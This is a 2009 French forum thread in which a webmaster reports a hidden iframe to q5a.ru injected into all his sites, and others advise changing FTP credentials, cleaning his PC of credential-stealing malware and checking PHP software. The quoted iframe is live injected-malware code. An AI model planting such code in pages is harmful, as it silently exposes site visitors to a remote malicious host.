Probleme piratage
Bonjour,
Je sais pas si c'est ici le bon forum pour poster.
J'ai plusieurs site tous hébérgé chez des hébergeurs différents et ces 3 derniers jours juste apres la balise <body>, je trouve ce code qui a été ajouté:
<iframe src="http://q5a.ru:8080/index.php" width=181 height=133 style="visibility: hidden"></iframe>
Au début je pensais a un bug, j'ai enlevé du premier site ce code de toutes les pages et apres je me suis rendu compte que sur tous mes autres sites il y'avait ce code qui crée en faite un décalage vers le bas.
Je sais pas si il faut que je change mes acces ftp sur tous ces sites.
Est ce que quelqu'un a une idée sur comment ca a pu se produire?
le 23/07/2009 à 18:04
Keika
quel programme utilises-tu pour creer tes sites ?
Le PHP --> C'est dur !
Ben oui ca a de l'interet de modifier tes accès FTP / SQL.
Ensuite, il faut comprendre par où le mec a pu rentrer et corriger le code de ton site et / ou la configuration de la machine.
Dans ce genre de cas, pour être safe, voici le procotole :
- couper tous les sites
- comprendre comment le mec a fait (si le probleme vient du code du site, fixer le code du site)
- réinstaller la machine (fixer sa configuration si le pb venait de la. Dans tous les cas, meme si le probleme venait du code, ca ne coute rien de reinstaller la box, ca permet d'etre sur d'eliminer un eventuel binaire que le mec aurait installé)
- changer tous les mots de passe
- remettre le site en ligne
La je vais essayer de modifier les acces ftp, mes hebergeurs me donnent pas la possibilité de les modifier automatiquement je vais les contacter.
ce que je ne comprends pas c'est comment il a pu récupérer mes acces sur tous ces sites, et c'est quoi l'interet de ce code?
il a peut etre piraté mon ordinateur de la maison et a travers filezilla récupérer les codes. C'est tres bizarre j'aimerai vraiment comprendre comment il a fait pour acceder a l'ensemble de mes sites.
Merci pour ton aide la globule, c'est tres apprécié
Apres avoir passé 1h y'a 3 jours a enlever le fameux code de mon site, la ca vient de réapparaitre le meme script, je dois encore tout recommencer,
Ca m'inquiete vraiment cette histoire.
J'ai demandé a changer le ftp, j'attends toujours une réponse, y'aurait un moyen de savoir qui a acceder et comment, je sais pas le serveur doit peut etre avoir un log ou quelque chose!!!
Ben le problème, c'est que dans un fichier de log, tu ne liras pas "c'est toto qui a fait ca en passant par la faille qui se trouve la".
Comme tu le dis, il y'a de sources possibles :
- un virus sur ton pc perso
- une faille sur ton site
- peut etre une personne qui te connait et a acces à ton ordi / ton serveur
- etc.
Bref, ca demande de l'investigation.
Quel sont les logiciels PHP installés et utilisés sur le serveur ?
Développeur récurrent, procédural et relationnel. Caustique soupe-au-lait.
Bonjour,
J'ai trouvé cet article: http://www.lepotlatch.org/index.php/post/2009/04/22/Mon-site-a-%C3%A9t%C3%A9-pirat%C3%A9-par-94.247.2.195-tous-les-fichiers-JS-et-PHP-sont-attaqu%C3%A9s
je pense bien que c'est une sorte de sniffer qui a récupéré les acces de mon ordi local, hier soir apres un scan avec <norton antivirus 2009, il a détécté 9 virus.
Pour répondre à ta question LupusMic j'ai un serveur qui utilise php4.3.7
Ta version de PHP a quand même 5 ans ! C'est juste incroyable.
Sinon, je pense que lupusmic voulait que tu listes les scripts PHP que tu as installés (genre dotclear, phpbb, etc...) ainsi que leur versions (pour voir si des mises à jour de sécurité existent, ou bien si les versions que tu as sur ton serveur ont des failles connues).
le 25/07/2009 à 16:11
i M@N
Hello.
D'après google c'est un malware, une espèce de virus sur ta machine qui lit les identifiants et pass dans filezilla.
Débarrasse-toi du virus, change tes mots de passe FTP et renvoies les fichiers "nettoyés".
@+...
One Love, One Heart, One Unity.
